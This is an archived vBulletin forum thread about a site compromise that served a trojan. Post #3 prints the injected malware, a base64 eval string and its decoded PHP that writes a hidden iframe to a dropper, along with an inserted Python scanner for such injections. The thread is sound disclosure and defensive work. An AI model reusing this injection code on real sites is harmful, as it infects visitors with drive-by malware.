The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
new 0 day exploit? (bekebu.in / cuzelu.in)
I have noticed in the last few days that my vB install has been trying to infect users with a trojan coming from bekebu.in and/or cuzelu.in.
http://support.clean-mx.de/clean-mx/...n&submit=query
Not sure if this is a new 0-day going around or not, but it may be worth someone's time to look into this.

Added later (Unix timestamp 1277395487):
I have blocked the /16 that those domains are coming from, and Google Safe Browsing doesn't come up with the malware warning anymore. 91.188.0.0/16
http://www.db.ripe.net/whois?form_ty...&submit=Search
http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55
http://www.senderbase.org/senderbase...g=91.188.59.55
#2
What file is calling that site?
#3
I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.
Code:
@eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9"));
Decoded:
Code:
if (!isset($_COOKIE['xlov'])) {   // cookie gate: the iframe is served only once per browser
    $xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
    $ifrand = mt_rand(0,111);
    $domb = "http: // www. fealatoc.co .cc/clo.php";   // dropper URL (broken on purpose, see below)
    foreach ($xb as $xbb) {
        // only fire for real browser user agents, not crawlers or scanners
        if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
            echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000) ;
 var expires=expDate.toGMTString();
 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
            break;
        }
    }
}
The URL in the script code is broken on purpose.

Added later (Unix timestamp 1277566152):
Thanks to the people over at Tapatalk for helping me figure this out. :wink:
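A scanner for this kind of injection, added here as an example and not taken from the thread, from vBulletin or from Tapatalk: it regex-scans raw datastore (or plugin phpcode) values for eval(base64_decode(...)), peels stacked wrappers by re-scanning each decoded result, and pulls out the indicators a practitioner wants from the decoded payload (URLs to block, the cookie gate name, whether an iframe is written). The sample rows, the two-layer wrapping and the malware.example domain are constructed for the example; it does not parse PHP serialization, it just scans the raw text, which is what you want when the injected code sits in the middle of a serialized blob.

```python
import base64
import binascii
import re

# eval(base64_decode("...")) with optional leading @, arbitrary whitespace, and the
# backslash-escaped quotes that appear when a datastore value is dumped as a PHP string.
EVAL_B64_RE = re.compile(
    r'''@?eval\s*\(\s*base64_decode\s*\(\s*\\?["']([A-Za-z0-9+/=\s]+?)\\?["']\s*\)\s*\)''',
    re.IGNORECASE,
)
URL_RE = re.compile(r'''https?://[^\s"'<>]+''', re.IGNORECASE)
COOKIE_RE = re.compile(r'''\$_COOKIE\[\s*['"]([^'"]+)['"]\s*\]''')
IFRAME_RE = re.compile(r'<iframe\b', re.IGNORECASE)


def decode_b64(blob: str) -> str:
    """Lenient base64 decode: drop whitespace, repair padding, never raise."""
    clean = re.sub(r'\s+', '', blob)
    clean += '=' * (-len(clean) % 4)
    try:
        return base64.b64decode(clean, validate=False).decode('utf-8', errors='replace')
    except (binascii.Error, ValueError):
        return ''


def decode_layers(text: str, max_depth: int = 5) -> list:
    """Follow every eval(base64_decode()) in text, re-scanning each decoded result
    so stacked wrappers are peeled; returns the decoded layers outermost first."""
    layers = []
    frontier = [text]
    for _ in range(max_depth):
        nxt = []
        for chunk in frontier:
            for m in EVAL_B64_RE.finditer(chunk):
                decoded = decode_b64(m.group(1))
                if decoded:
                    layers.append(decoded)
                    nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


def extract_indicators(php: str) -> dict:
    """Pull out what is worth blocking or hunting for: URLs, cookie gates, iframes."""
    return {
        'urls': sorted(set(URL_RE.findall(php))),
        'cookies': sorted(set(COOKIE_RE.findall(php))),
        'iframe': bool(IFRAME_RE.search(php)),
    }


def scan_rows(rows) -> list:
    """rows: iterable of (title, data), e.g. from SELECT title, data FROM datastore."""
    findings = []
    for title, data in rows:
        layers = decode_layers(data)
        if not layers:
            continue
        finding = {'title': title, 'depth': len(layers), 'payload': layers[-1]}
        finding.update(extract_indicators('\n'.join(layers)))
        findings.append(finding)
    return findings


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample (not the thread's real payload): same shape as the decoded code
# in post #3 (cookie gate, user-agent check, 1x1 iframe) but with a placeholder domain.
SAMPLE_PAYLOAD = (
    "if (!isset($_COOKIE['xlov'])) {\n"
    "  $domb = \"http://malware.example/clo.php\";\n"
    "  if (strstr(strtolower($_SERVER['HTTP_USER_AGENT']), 'msie')) {\n"
    "    echo '<iframe width=\"1\" height=\"1\" src=\"' . $domb . '\"></iframe>';\n"
    "  }\n"
    "}"
)
# Wrapped twice, since droppers often stack encoders; the outer quotes are
# backslash-escaped and the newline is a literal \r\n, as the page's dump shows.
_INNER = '@eval(base64_decode("' + _b64(SAMPLE_PAYLOAD) + '"));'
SAMPLE_ROWS = [
    ('pluginlist', '$legit = 1;\\r\\n@eval(base64_decode(\\"' + _b64(_INNER) + '\\"));'),
    ('options', 'a:1:{s:7:"bbtitle";s:8:"My Forum";}'),  # clean row, must not match
]

if __name__ == '__main__':
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f['title']}: {f['depth']} layer(s), urls={f['urls']}, "
              f"cookies={f['cookies']}, iframe={f['iframe']}")
        print(f['payload'])
```

Feed it the rows from `SELECT title, data FROM datastore` and also the plugin table's phpcode column: in vBulletin 3 the pluginlist datastore entry is a cache rebuilt from the plugin table, so clearing the cache alone brings the injection back on the next rebuild if the plugin row (or a file that re-injects it) is still there. When checking whether a site is still serving the iframe, use a fresh browser or delete the xlov cookie first, because the payload only emits the iframe once per browser.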
#4
you're running Tapatalk on your vB? or is it just a clean install of vB?
#5
We have been using Tapatalk for a while now. Last week a few members started getting virus warnings about bekebu.in and/or cuzelu.in. A few days ago, one of the admins at Tapatalk contacted us to let us know they had shut us down on their side due to the virus issue, and they have helped us locate some of this code.

Added later (Unix timestamp 1277640262):
fealatoc . co . cc info:
http://www.db.ripe.net/whois?form_ty...&submit=Search
http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7
#6
Post Thanks 'Hack' got hacked.
#7
Also reported to the PT author at https://vborg.vbsupport.ru/showpost....&postcount=948
#8
I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.
#9
Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the Tapatalk plugin. I think it's the Post Thanks 'hack' that is vulnerable, but this will need to be tested and confirmed.
#10
I am not sure either; the information is mixed, as some forums that didn't install Tapatalk also got hacked. But one forum found a mysterious PHP file added to the Tapatalk directory, which caught our attention. So we went ahead and checked our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).
We have sent out emails to all forum owners to upgrade, so I hope to keep this infection to a minimum.